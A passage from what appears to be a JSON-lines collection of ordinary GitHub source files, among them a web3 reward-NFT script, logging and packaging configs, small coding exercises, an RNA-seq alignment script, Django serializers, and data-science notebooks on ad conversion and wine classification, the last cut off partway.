1e-100\n\n\"\"\" end \"\"\"","repo_name":"yutingshih/LdG-sim","sub_path":"utils/param.py","file_name":"param.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"20321204788","text":"\"\"\"\nrewards.py: logic for sending transactions and interactions with Reward contract\n\"\"\"\nimport json\nfrom helpers import initializeRewardContract\nimport config\n\n# getNewReward(): gets a new reward for the specified 
user with the passed in URI\n# returns the token id of the new reward nft\ndef getNewRewardFromChain(user, uri):\n w3, contract, acct = initializeRewardContract(user, './build/contracts/Reward.json')\n\n # Perform transaction, essentially give a new nft to\n tx = contract.functions.requestNewReward(acct.address, uri).buildTransaction({\n 'nonce': w3.eth.getTransactionCount(acct.address)\n })\n signed_tx = w3.eth.account.signTransaction(tx, user['private_key'])\n hash = w3.eth.sendRawTransaction(signed_tx.rawTransaction)\n\n # get the id of the requested reward (return is in hex base 16)\n return int(w3.eth.getTransactionReceipt(hash)['logs']['0']['data'], 16)\n\n# deleteRewardFromChain(): deletes the specified reward id from the chain\ndef deleteRewardFromChain(user, reward_id):\n w3, contract, acct = initializeRewardContract(user, './build/contracts/Reward.json')\n\n # Perform transaction, burn (delete the nft)\n tx = contract.functions.consumeReward(reward_id).buildTransaction({\n 'nonce': w3.eth.getTransactionCount(acct.address)\n })\n signed_tx = w3.eth.account.signTransaction(tx, user['private_key'])\n w3.eth.sendRawTransaction(signed_tx.rawTransaction)\n\n# getRewardURI(): gets the URI associated with a specified reward id\ndef getRewardURI(user, reward_id):\n w3, contract, acct = initializeRewardContract(user, './build/contracts/Reward.json')\n\n # get uri (doesn't require transaction)\n return contract.functions.tokenURI(reward_id).call()","repo_name":"swathi-469/Blockhack","sub_path":"rewards.py","file_name":"rewards.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5704387701","text":"import os\nimport logging\nfrom logging.config import dictConfig\nimport pathlib\n\nlogs_directory = os.getcwd()+\"/logs\"\npathlib.Path(logs_directory).mkdir(parents=True, exist_ok=True)\n\n\ndef setup_logging():\n logging_config = dict(\n version = 1,\n disable_existing_loggers = True,\n formatters = {\n 'f': {\n 'format':'%(asctime)s %(levelname)-8s %(message)s',\n 'datefmt': \"%Y/%m/%d %H:%M:%S %Z%z\"\n },\n 'simple': {\n 'format': \"%(asctime)s %(process)d %(filename)s %(lineno)s %(levelname)s %(message)s\",\n 'datefmt': \"%Y/%m/%d %H:%M:%S %Z%z\"\n },\n \"extra\": {\n \"format\": \"%(asctime)s %(process)d %(thread)d %(filename)s %(lineno)s %(funcName)s %(levelname)s %(message)s\",\n 'datefmt': \"%Y/%m/%d %H:%M:%S %Z%z\"\n }\n },\n handlers = {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'level': 'DEBUG',\n \"formatter\": \"simple\",\n \"stream\": \"ext://sys.stdout\",\n },\n 'info_file_handler': {\n \"class\": \"logging.handlers.TimedRotatingFileHandler\",\n \"level\": 'INFO',\n \"formatter\": \"extra\",\n \"filename\": logs_directory+\"/event_tracker_info.log\",\n \"when\": \"midnight\",\n \"interval\": 1,\n \"backupCount\": 31,\n \"encoding\": \"utf8\"\n },\n 'error_file_handler': {\n \"class\": \"logging.handlers.TimedRotatingFileHandler\",\n \"level\": 'ERROR',\n \"formatter\": \"extra\",\n \"filename\": logs_directory+\"/event_tracker_errors.log\",\n \"when\": \"midnight\",\n \"interval\": 1,\n \"backupCount\": 31,\n \"encoding\": \"utf8\"\n }\n },\n loggers = {\n \"my_module\": {\n \"level\": \"ERROR\",\n \"handlers\": [\"console\"],\n \"propagate\": \"no\"\n }\n },\n root = {\n \"level\": \"INFO\",\n \"handlers\": [\"console\", \"info_file_handler\", \"error_file_handler\"]\n }\n )\n\n dictConfig(logging_config)\n\n log = logging.getLogger('werkzeug')\n 
log.setLevel(logging.ERROR)","repo_name":"Akshay2Agarwal/event-tracker","sub_path":"app_logging.py","file_name":"app_logging.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40901028446","text":"#!/usr/bin/env python\n# The MIT License (MIT)\n# https://zenn.dev/sikkim/articles/490f4043230b5a\n\n\nfrom setuptools import setup\n\nDESCRIPTION = '' # Tools description\nNAME = 'pubmed_zenbu'\nAUTHOR = 'Takayuki Suzuki'\nAUTHOR_EMAIL = '' # Suzuki-san's email address\nURL = 'https://github.com/dogrun-inc/pubmed-zenbu'\nLICENSE = '' # MIT License ? \nDOWNLOAD_URL = URL\nVERSION = '' # Version number\nPYTHON_REQUIRES = '>=3.9' \nINSTALL_REQUIRES = [\n 'pytz>=' # This is Timezone library\n]\nPACKAGES = [\n 'pubmed_zenbu'\n]\nKEYWORDS = 'pubmed scraping article dogrun'\nCLASSIFIERS=[\n 'License :: OSI Approved :: MIT License', # MIT License ?\n 'Programming Language :: Python :: 3.9' \n]\nwith open('README.md', 'r', encoding='utf-8') as fp:\n readme = fp.read()\nLONG_DESCRIPTION = readme\nLONG_DESCRIPTION_CONTENT_TYPE = 'text/markdown'\n\nsetup(\n name=NAME,\n version=VERSION,\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n long_description_content_type=LONG_DESCRIPTION_CONTENT_TYPE,\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n maintainer=AUTHOR,\n maintainer_email=AUTHOR_EMAIL,\n url=URL,\n download_url=URL,\n packages=PACKAGES,\n classifiers=CLASSIFIERS,\n license=LICENSE,\n keywords=KEYWORDS,\n install_requires=INSTALL_REQUIRES\n)","repo_name":"dogrun-inc/pubmed-zenbu","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30149854157","text":"\"\"\"\r\n\n\nGiven an integer, return `\"odd\"` if the sum of all _odd_ digits is greater\nthan the sum of all _even_ digits. Return `\"even\"` if the sum of _even_ digits\nis greater than the sum of _odd_ digits, and `\"equal\"` if both sums are the\nsame.\n\n### Examples\n\n odds_vs_evens(97428) ➞ \"odd\"\n # odd = 16 (9+7)\n # even = 14 (4+2+8)\n \n odds_vs_evens(81961) ➞ \"even\"\n # odd = 11 (1+9+1)\n # even = 14 (8+6)\n \n odds_vs_evens(54870) ➞ \"equal\"\n # odd = 12 (5+7)\n # even = 12 (4+8+0)\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef odds_vs_evens(num):\n s1 = 0\n s2 = 0\n for ch in str(num):\n if int(ch)%2 ==0:\n s1 += int(ch)\n else:\n s2 += int(ch)\n if s1>s2:\n return 'even'\n if s2>s1:\n return 'odd'\n return 'equal'\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"uWpS5xMjzZFAkiQzL_6.py","file_name":"uWpS5xMjzZFAkiQzL_6.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22412585814","text":"import subprocess\nimport pandas as pd\nimport sys\nimport os.path\nimport os\nfrom joblib import Parallel, delayed\nimport math\n\nif len(sys.argv) ==1:\n print(\"TOO FEW ARGUMENTS... PLEASE ADD SRR_ACC_LIST.TXT FILE\")\n sys.exit(-1)\nelif len(sys.argv) >2:\n print(\"TOO MANY ARGUMENTS... IGNORING EXTRA ARGUMENTS...\")\n \nif os.path.isfile(sys.argv[1]) == False:\n print(\"SRR FILE NOT FOUND... 
EXITING...\") \n sys.exit(-2)\n\ncwd = (str(os.getcwd()) + '/')\nprint(cwd)\nprint(\"PROGRAM RUNNING...\")\n\ndf= pd.read_csv(sys.argv[1],header=None)\nsras = df[0].tolist()\n\n#build index (hash out if previously done)\nos.system(\"/home/ubuntu/project/rnaseq/student_tools/STAR-2.5.2a/bin/Linux_x86_64/STAR --runThreadN 8 --runMode genomeGenerate \\\n --genomeDir ./STAR_index --genomeFastaFiles /home/ubuntu/project/rnaseq/refs/ref_index/GCA_000349665_1.fasta \\\n --sjdbGTFfile /home/ubuntu/project/rnaseq/refs/Mesocricetus_auratus.MesAur1.0.104.gtf--sjdbOverhang 99\")\n\nfor sra in sras:\n print(\"Aligning \" + sra)\n y =\"STAR --runThreadN 31 --genomeDir /home/ubuntu/project/rnaseq/STAR_INDEX --limitGenomeGenerateRAM 120000000000 --readFilesIn /home/ubuntu/project/rnaseq/data/fasta/trimmed/\"+ sra +\"_1_val_1.fq.gz /home/ubuntu/project/rnaseq/data/fasta/trimmed/\" + sra +\"_2_val_2.fq.gz --readFilesCommand zcat --outSAMtype BAM SortedByCoordinate --quantMode GeneCounts --outFileNamePrefix /home/ubuntu/project/rnaseq/STAR_ALIGNMENT/\"+ sra\n os.system(y)\n print(\"Successfully aligned \" + sra)\n continue\n","repo_name":"austinu17/BMI_5710","sub_path":"Python_Scripts/STAR_Align.py","file_name":"STAR_Align.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30050563567","text":"\"\"\"\r\n\n\nHarry is a postman. He's got a post office with a size of `n*m(a matrix / 2D\nlist)`. Each slot at the 2D list represents the number of letters in that\nspot. Harry can only go right and down. He starts at (0, 0), and ends at (n-1,\nm-1). `n` represents the height, and `m` the length. Return the maximum amount\nof letters he can pick up. He can only pick up letters if he is on that spot.\n\n### Examples\n\n harry([[5, 2], [5, 2]]) ➞ 12\n # (5+5+2)\n harry([\n [1, 2, 3, 4, 5],\n [6, 7, 8, 9, 10],\n [11, 12, 13, 14, 15]\n ]) ➞ 72\n # (1+6+11+12+13+14+15)\n harry([[]]) ➞ -1\n\n### Notes\n\nLike you saw in example 3, if the matrix is empty, return `-1`.\n\n\"\"\"\r\n\ndef harry(po):\n n, m = len(po), len(po[0])\n if n == 0 or m == 0:\n return -1\n if n == 1 and m == 1:\n return po[0][0]\n for c in range(1, m):\n po[0][c] += po[0][c-1]\n for r in range(1, n):\n po[r][0] += po[r-1][0]\n for r in range(1, n):\n for c in range(1, m):\n po[r][c] += max(po[r-1][c], po[r][c-1])\n return po[-1][-1]\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"7yo5FJX4xFbNxim5q_4.py","file_name":"7yo5FJX4xFbNxim5q_4.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11492963903","text":"from django.db import transaction\n\nfrom MainApp.models import CierreCaja, DetalleCierre\nfrom rest_framework import serializers\n\nfrom MainApp.serializers import CajaSerializer\nfrom MainApp.serializers.detalle_cierre import DetalleCierreSerializer\nfrom MainApp.serializers.user import UserNameSerializer\n\n\nclass CierreCajaSerializer(serializers.ModelSerializer):\n detalle = DetalleCierreSerializer(many=True)\n # caja = CajaSerializer()\n\n class Meta:\n model = CierreCaja\n fields = ('id', 'caja', 'usuario', 'apertura', 'cierre', 'vendido', 'diferencia',\n 'vendido_costo', 'creado', 'modificado', 'detalle')\n\n @transaction.atomic\n def create(self, validated_data):\n # extraemos detalles del movimiento\n detalle_data = validated_data.pop('detalle')\n\n # creamos el movimiento\n cierre = 
CierreCaja.objects.create(**validated_data)\n\n # # creamos los detalles del movimiento\n for detalle_data in detalle_data:\n DetalleCierre.objects.create(cierre=cierre, **detalle_data)\n\n return cierre\n\nclass CierreCajaVerifySerializer(serializers.ModelSerializer):\n detalle = DetalleCierreSerializer(many=True)\n # caja = CajaSerializer()\n\n class Meta:\n model = CierreCaja\n fields = ('id', 'caja', 'usuario', 'apertura', 'cierre', 'vendido', 'diferencia',\n 'vendido_costo', 'creado', 'modificado', 'detalle', 'activo')\n\nclass CierreCajaUpdateSerializer(serializers.ModelSerializer):\n # detalle = DetalleCierreSerializer(many=True)\n\n class Meta:\n model = CierreCaja\n fields = ('id', 'caja', 'usuario', 'apertura', 'cierre', 'vendido', 'diferencia',\n 'vendido_costo', 'activo')\n\n\nclass CierreCajaListadoSerializer(serializers.ModelSerializer):\n caja = CajaSerializer()\n usuario = UserNameSerializer()\n costo_vendido = serializers.DecimalField(default=0, max_digits=18, decimal_places=2, required=False)\n\n class Meta:\n model = CierreCaja\n fields = ('id', 'caja', 'usuario', 'apertura', 'cierre', 'vendido', 'diferencia',\n 'vendido_costo', 'creado', 'modificado', 'costo_vendido')\n","repo_name":"CoriAle/app","sub_path":"MainApp/serializers/cierre_caja.py","file_name":"cierre_caja.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22798563157","text":"data=open(\"data.txt\",\"r\")\nquestions=data.read()\nques=questions.split('\\n')\nwhile 1:\n word=input(\"Enter your query word:\")\n word=word.lower()\n if(word=='quit'):\n break\n for i in ques:\n if word in i:\n print(ques[ques.index(i)+1])\n break","repo_name":"nabinadhikariofficial/BCTLab","sub_path":"Artificial Intelligence/faq.py","file_name":"faq.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"71931269211","text":"#Logistic model on Ad Purchase Conversions\n#This is to create a logistics learning model on whether a user will download the advertised app after clicking into the ad\n#In this version, we will estimate the model using Scikit-Learn\n#Date parsing coding contributed by Jason Ip (not owner) \n\n##############\n\nimport csv\nimport numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.cross_validation import train_test_split\n\n#load training dataset at 300,000 rows at a time\n\nCHUNKSIZE = 300000\nreader = pd.read_csv('C:/Users/Tony Cai/Documents/Ad Prediction/train.csv', header=0, engine='c', chunksize=CHUNKSIZE)\n\ndata = pd.DataFrame()\n\nfor chunk in reader:\n data = data.append(chunk)\n\n#Creating Year, Month and Day Columns\ndata['Year2'] = data['click_time'].str[:4]\ndata['Month2'] = data['click_time'].str[5:7]\ndata['Day2'] = data['click_time'].str[8:10]\ndata['hour2'] = data['click_time'].str[11:13]\ndata['minute2'] = data['click_time'].str[14:16]\ndata['second2'] = data['click_time'].str[17:19]\n\n#Delete click time and attributed time columns \ndel data['click_time']\ndel data['attributed_time']\n\n#Turn year, month and day columns from str to int\ndata['Year']=data['Year2'].astype(int)*1\ndata['Month']=data['Month2'].astype(int)*1\ndata['Day']=data['Day2'].astype(int)*1\ndata['Hour']=data['hour2'].astype(int)*1\ndata['Minute']=data['minute2'].astype(int)*1\ndata['Second']=data['second2'].astype(int)*1\ndel data['Year2']\ndel data['Month2']\ndel 
data['hour2']\ndel data['Day2']\ndel data['minute2']\ndel data['second2']\n\n#Overview of size of dataframe\nprint(data.shape)\nprint(list(data.columns))\n\n#Looks at headers of dataframe\ndata.head\n\nX_cols = ['ip', 'app', 'device', 'os', 'channel', 'Day', 'Hour', 'Minute', 'Second']\n\n#Model estiamtion\n\n#Create an array to house coefficients\ncoefficients = pd.DataFrame(columns = X_cols)\nintercepts = pd.DataFrame(columns = ['intercept'])\n\n#Estimate model parameters by repeatedly randomly sampling 80% of training set to estimate model and average out resulting parameters \nsimulation_iterations = 10\n\nfor i in range(1, simulation_iterations+1):\n \n #split training set by 70% train and 30% validation\n train, test = train_test_split(data, test_size=0.3)\n X_train = train[X_cols]\n Y_train = train['is_attributed']\n \n #train logistic model for said instance\n logreg = LogisticRegression()\n logreg.fit(X_train, Y_train)\n \n #collecting/storing model parameters\n coefficients = coefficients.append(pd.DataFrame(logreg.coef_, columns = X_cols), ignore_index=True)\n intercepts = intercepts.append(pd.DataFrame(logreg.intercept_, columns = ['intercept']), ignore_index=True)\n\n#Estimating parameters for the model by averaging the coefficients from repeated testing\nmodel_param = coefficients.mean(axis=0)\nintercept = float(intercepts.mean(axis=0))\n\nparam = tuple(model_param)\n\nprint(model_param)\n\n#########\n\n#Prediction of Test data\n\n#Define Logistic Function for prediction\n\ndef logit(z):\n return 1/(1+np.exp(-1*z))\n\n#load test data at 300,000 rows at a time\n\ntest_reader = pd.read_csv('C:/Users/Tony Cai/Documents/Ad Prediction/test.csv', header=0, engine='c', chunksize=CHUNKSIZE)\n\ntest_data = pd.DataFrame()\n\nfor chunk in test_reader:\n test_data = test_data.append(chunk)\n\n#Creating Year, Month and Day Columns\ntest_data['Year2'] = test_data['click_time'].str[:4]\ntest_data['Month2'] = test_data['click_time'].str[5:7]\ntest_data['Day2'] = test_data['click_time'].str[8:10]\ntest_data['hour2'] = test_data['click_time'].str[11:13]\ntest_data['minute2'] = test_data['click_time'].str[14:16]\ntest_data['second2'] = test_data['click_time'].str[17:19]\n\n#Delete click time and attributed time columns \ndel test_data['click_time']\n\n#Turn year, month and day columns from str to int\ntest_data['Year']=test_data['Year2'].astype(int)*1\ntest_data['Month']=test_data['Month2'].astype(int)*1\ntest_data['Day']=test_data['Day2'].astype(int)*1\ntest_data['Hour']=test_data['hour2'].astype(int)*1\ntest_data['Minute']=test_data['minute2'].astype(int)*1\ntest_data['Second']=test_data['second2'].astype(int)*1\ndel test_data['Year2']\ndel test_data['Month2']\ndel test_data['hour2']\ndel test_data['Day2']\ndel test_data['minute2']\ndel test_data['second2']\n\n#Create dataframe to store predicted values\n\npred = pd.DataFrame()\n\n#Create an matrix for test inputs\ntest_input = np.asmatrix(test_data[X_cols].values)\n\n#Calculation of predicted values\nz = np.add(np.matmul(test_input, param),intercept)\npredicted_values = logit(z)\n\n#create submission file\n\n#create results array\nclick_id = pd.DataFrame(test_data['click_id'], columns = ['click_id'])\n\npredicted_values = predicted_values.transpose(1,0)\npredicted_values = np.asarray(predicted_values)\npredicted = np.asarray(tuple(predicted_values))\npred = pd.DataFrame(predicted, columns = ['is_attributed'])\n\nresults = pd.concat([click_id, pred], axis = 1)\n\n\n#Publish results as CSV\n\nwith open('C:/Users/Tony Cai/Documents/Ad 
Prediction/submission.csv','w') as output:\n writer = csv.writer(output, lineterminator='\\n')\n writer.writerows([['click_id','is_attributed']])\n writer.writerows(results.values)\n \n\n\n","repo_name":"epzilonzigma/ML_Practice","sub_path":"TalkingData AdTracking Fraud Detection Challenge/Python Script.py","file_name":"Python Script.py","file_ext":"py","file_size_in_byte":5153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16773614049","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom IPython.core.display import display, HTML\ndisplay(HTML(\"\"))\n\n\n# # Question1.What exactly is the business problem you are trying to solve? Summarize this in the form of a meaningful problem statement? \n\n# ## Determining the category or variety of grape used in making wines based on several chemical characteristics of individual wines\n\n# # Problem Statement\n\n# ## Predicting the category or variety of grape used in making wines based on the chemical composition of 13 constituents found in each of the three types of grape\n# \n\n# In[ ]:\n\n\n# Data Required (We need to have data related to charateristics based on which a particular class is assigned to train our model)\n\n\n# # Question2. What are some of preliminary decisions you may need to make based on your problem statement? Your answer should include identification of an initial machine learning algorithm you will apply with respect to the problem statement in (1). Justification should be based on identification of the category of machine learning (supervised, unsupervised, etc.) as well as suggested machine learning algorithm from within the identified machine learning category. \n\n# ## The business problem we are trying to solve is predicting the type of wine where we are dealing with labeled data.(Cultivar) \n# \n\n# # Identification of the category of Machine Learning\n\n# ## As we have a classified data where there is a target class(Cultivar) and some characteristics based on which this target is classified, we need to train the model to perform same process \n\n# ## The category of machine learning which deals with labeled data is Supervised Learning \n# \n\n# ## In Supervised learning both input features and target variable are available for each training data. A supervised learning algorithm then tries to learn the relationship between the input and output variables from the data, so that when input x is given, it is able to produce the corresponding output y. And to do so, the algorithm iterates the training data to adjust the parameters of a model, until it could generalize the data. This is called the learning process. 
\n# \n\n# ## As we are trying to determine(predict) the category of grape which is a labeled variable we need to choose between the sub division of Supervised Learning \n# ## Regression and Classification\n# ## Regression is used when the target variable is numeric and continuous \n# ## Classification is used when the target variable is categorical \n# ## Our problem has target variable as categorical type (Type of grape) \n\n# ## So under the types of supervised learning algorithms we would eliminate the choice of Linear Regression as it deals with continuous variables \n\n# ## We need to choose from the further available alogorithms Logistic Regression, Decision Tree and Random Forest\n\n# # Identification of the category of Machine Learning Algorithm \n\n# ## While all three of the remaining algorithms are applicable to achieve the objective, we will start with Logistic Regression.\n\n# ## The time consumed and complexity of logistic regression model is less when compared to Decision Trees and Random Forests. As there will be creation a multiple branches or if else loops created in case of Decision trees and random forests resulting more time consumption for training the model \n\n# ## As there are three different categories in the target variable so we choose Multinomial Logistic Regression which classifies based on one versus rest method\n\n# ### In Multi-class logistic regression creates different groups using one versus ret methodology, \n# ### For example Cultivar1 class the outputs are considered as 1,-1,-1 for Cultivar1, Cultivar2, Cultivar3 respectively \n# ### In case of Cultivar2 class the outputs are considered as -1,1,-1 for Cultivar1, Cultivar2, Cultivar3 respectively\n# ### Similarly for Cultivar3 is as -1,-1,1 for Cultivar1, Cultivar2, Cultivar3 respectively\n# ### So after this the first model is created as M1 based on input features and the first column outputs for example from above conditions 1,-1,-1 and \n# ### this model(M1) will be able to predict if the output is Cultivar1 or not\n# ### Similarly M2 model will be created for Cultivar2 as output\n# ### Similarly M3 model will be created for Cultivar3 as output\n\n# ### when test data is given then the output would be calculated from three model M1, M2, M3 (probabilities as otputs)\n# ### Were sum of the three probabilites is equal to 1\n# ### For generation og prediction the array of three probabilities is considered and the one with highest probability is considered to be the prediction output\n# ### So if the output probabilities are [0.25, 0.25, 0.5] the output would be Cultivar3\n\n# In[2]:\n\n\n#Loading the pandas library\nimport pandas as pd\n\n\n# In[3]:\n\n\n#Loading the numpy library\nimport numpy as np\n\n\n# In[4]:\n\n\n#Loading sklearn for machine learning packages\nimport sklearn\n\n\n# In[5]:\n\n\n## importing the wine dataset with pandas\nWine_DF = pd.read_csv('D://wine.csv', header=0, sep=',')\n\n\n# In[6]:\n\n\n#Seeing the shape of the dataset\nprint(\"Shape of the data contained in wine.csv is\", Wine_DF.shape)\n#178 observations and 14 columns\n\n\n# ## The dataset has 178 observations and 14 columns \n\n# In[148]:\n\n\n#As it is a classification problem by using pairplot we can see three different classes classified based on the Cultivar\nimport seaborn as sns\nsns.pairplot(Wine_DF, hue = 'Cultivar', palette=\"husl\")\n\n\n# In[8]:\n\n\n#From the graph above we can see that the data is not hugely overlapping between so we can use the Logistic Regression model for our classification 
problem\n\n\n# In[9]:\n\n\n#Looking at the features\nWine_Features = Wine_DF.columns\nprint(\"The features (or attributes) recorded are :\", Wine_Features)\n\n\n# ## The 13 chemical characteristics of wines are 'Cultivar', 'Alcohol', 'MalicAcid', 'Ash', 'Alkalinity', 'Magnesium','Phenols', 'Flavanoids', 'NonFlavanoids', 'Pcyanins', 'ColorIntensity','Hue', 'OD280', 'Proline' \n\n# In[10]:\n\n\n#Displaying the datatypes of each column\nWine_DF.info()\n\n\n# # 3.\tKeeping your preliminary decisions from (2) in mind, peruse the dataset to:\n# # a. Display the datatype of each of the 14 columns to determine if any of the columns need to be transformed to comply with the requirements of your chosen algorithm. Specify the names of columns that require transformation along with the transformation that need to be performed. Include a reasonable explanation as to why the columns need to be transformed as well as what appropriate transformation will be necessary to make the feature algorithm-compliant.\n# \n\n# In[11]:\n\n\n#Displaying the datatypes of the 14 columns\nWine_DF.dtypes\n\n\n# ## The dataset has all the features in numeric type and only the label variable Cultivar in object type \n\n# ## As the label column has object datatype converting it into its actual data type \n\n# In[12]:\n\n\n#Converting Cultivar dataframe to display actual datatypes\nWine_DF = Wine_DF.convert_dtypes()\n\n\n# In[13]:\n\n\n#After conversion looking at the datatypes\nWine_DF.dtypes\n\n\n# ## Logistic Regression requires that variables (feature and target) all need to be numeric (int, double, or float). Target field(Cultivar) in our dataset is of string datatype. Therefore, we will need to convert the variables into their numeric representations.\n# ### Label variable, Cultivar, is categorical with three categories. So, all we need to do is convert Cultivar1, Cultivar2, Cultivar3 values into appropriate numeric values such as 0/1/2 - This can be handled easily with Sklearn's Label Encoding function.\n\n# In[14]:\n\n\n#Transforming the target variable to numeric type for further analysis\n\n\n# In[15]:\n\n\nfrom sklearn.preprocessing import LabelEncoder\n#Creating an instance of the LabelEncoder class\nlabel_encode = LabelEncoder() \n#Apply the label_encode to fit_transform the Cultivar column, by creating a new column named 'Cultivar_Type'\nWine_DF['Cultivar_Type'] = label_encode.fit_transform(Wine_DF['Cultivar'])\n\n\n# In[16]:\n\n\n#Label Encoder acts as a mapping function or String Indexer and generates corresponding numbers to the string value\n\n\n# In[17]:\n\n\n#Looking at data after encoding\nWine_DF.dtypes\n\n\n# ## b.Identify any other data cleanup and pre-processing that may be required to get the data ready for your chosen machine learning algorithm. This may include handling missing values. Missing values for any feature are to be replaced with a median value for that feature. 
State so if missing values are not indicated.\n\n# In[18]:\n\n\n#Checking for null values\nWine_DF.isnull().sum()\n\n\n# ## No null values or missing values are present in the data, so no replacement of values is needed \n\n# In[19]:\n\n\n#target Class distribution\nWine_DF.groupby(['Cultivar']).size()\n\n\n# In[20]:\n\n\n#Label Encoded column distribution\nWine_DF.groupby(['Cultivar_Type']).size()\n\n\n# In[21]:\n\n\n################################################################################\n#Number of Cultivar1 type in the dataset is (59) -- (59/178)-- 33.14%\n#Number of Cultivar2 type in the dataset is (71) -- (71/178)-- 39.88% \n#Number of Cultivar3 type in the dataset is (48) -- (48/178)-- 26.96%\n#Fairly balanced\n\n\n# ## From the size output above we can see there is a mild imbalance in our data, as there are more records of Cultivar2 (Cultivar_Type 1: 71 records) \n\n# ## An unbalanced dataset means that when the model is trained, it is going to learn more from Cultivar2. This will create bias that may come in when the dataset is not balanced. The bias comes in since the model is trained with more samples of one case than the others. This may lead the model to predict one case more often than another, thus mispredicting some values of the other cases. So we have two options to balance the data. One is to eliminate the excess number of samples from the class that has a higher number of samples (if and only if this does not reduce the overall dataset size significantly), the other is to add samples to the categories with lower numbers. \n\n# ## One choice would be to eliminate the excess number of samples from the classes that have a higher number of samples, Cultivar1 (type 0) and Cultivar2 (type 1) \n\n# ## However, we have a fairly balanced dataset, as it does not have a huge imbalance in the distribution of Cultivar Types, and also a small amount of data. We prefer using all data for training the model rather than eliminating records, as the model needs to learn enough from the data to make correct predictions \n\n# In[22]:\n\n\n#So, if we chose to eliminate the excess number of samples from the classes that have a higher number of samples, Cultivar1 (type 0) and Cultivar2 (type 1)\n#Type_0 = len(Wine_DF[Wine_DF['Cultivar_Code']==0])\n#Type_1 = len(Wine_DF[Wine_DF['Cultivar_Code']==1])\n#Type_2 = len(Wine_DF[Wine_DF['Cultivar_Code']==2])\n#Balanced_Wine_DF = pd.concat( [Wine_DF[Wine_DF['Cultivar_Code']==0].sample(Type_2) ,Wine_DF[Wine_DF['Cultivar_Code']==1].sample(Type_2), Wine_DF[Wine_DF['Cultivar_Code']==2]])\n#print(len(Balanced_Wine_DF))\n\n\n# In[23]:\n\n\n#Balanced_Wine_DF \n\n\n# In[24]:\n\n\n#Balanced_Wine_DF.groupby('Cultivar_Code').size()\n\n\n# In[25]:\n\n\n#Looking at the balanced data\n#Balanced_Wine_DF.head() \n#Using the above code all the cultivars would be balanced to 48, which is the Cultivar3 (type 2) count\n\n\n# In[26]:\n\n\nModel_DF = Wine_DF[['Alcohol','MalicAcid','Ash','Alkalinity','Magnesium','Phenols','Flavanoids','NonFlavanoids','Pcyanins','ColorIntensity','Hue','OD280','Proline','Cultivar_Type']]\n\n\n# In[27]:\n\n\nModel_DF.head() \n\n\n# In[28]:\n\n\n#Interpreting the distribution (balance) of the data visually\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.countplot(x = 'Cultivar_Type', data = Model_DF , palette = \"husl\")\nplt.show()\n#Around 60 is the count of type 0\n#Around 70 is the count of type 1\n#Around 50 is the count of type 2\n\n\n# # 4.\tPerform preliminary exploratory data analysis (EDA) pertinent to the problem statement and your chosen machine learning algorithm in
(2). This may include basic statistics, data shape, grouping on the outcome variable, generating scatter plots or line plots, etc. as appropriate based on your chosen algorithm. Anything that can give you further insight into your dataset vis-à-vis the machine learning algorithm you have selected should be included with an explanation/conclusion of the output.\n\n# In[29]:\n\n\n#Exploratory Data Analysis\n\n\n# In[30]:\n\n\nModel_DF.describe()\n\n\n# In[31]:\n\n\n#The same count number in all the columns indicate every column has same number of values and no presence of missing values\n#From min value we can see no column in the has zero values \n#From max value we can understand the highest value of each chemical constituent(feature or column)\n\n\n# # Let us understand each column with respect to its statistics with our three Cultivar types \n\n# In[32]:\n\n\n#Considering statistics of Alcohol we can understand the following details \nModel_DF.groupby('Cultivar_Type')['Alcohol'].describe()\n\n\n# ## Alcohol \n# ## Cultivar1 Cultivar2 Cultivar3 \n# \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 13.744746 12.278732 13.153750\n# #Minimum 12.85 11.03 12.20\n# #Max 14.83 13.86 14.34 \n\n# In[33]:\n\n\n#Lets see individual correlation of alcohol with our label Cultivar_Type(It wouldnt be highly correlated as there is no significant variation in the values for each type as seen above)\nModel_DF[['Cultivar_Type','Alcohol']].corr()\n\n\n# In[34]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"Alcohol\",data=Model_DF)\n\n\n# In[35]:\n\n\n#Almost three types are having nearly same spread of datapoints related to alcohol due to which the feature is not highly significant in differentiating between the CultivarTypes\n\n\n# In[36]:\n\n\n#Considering statistics of MalicAcid we can understand the following details \nModel_DF.groupby('Cultivar_Type')['MalicAcid'].describe()\n\n\n# ## MalicAcid \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 2.010678 1.932676 3.333750\n# #Minimum 1.35 0.74 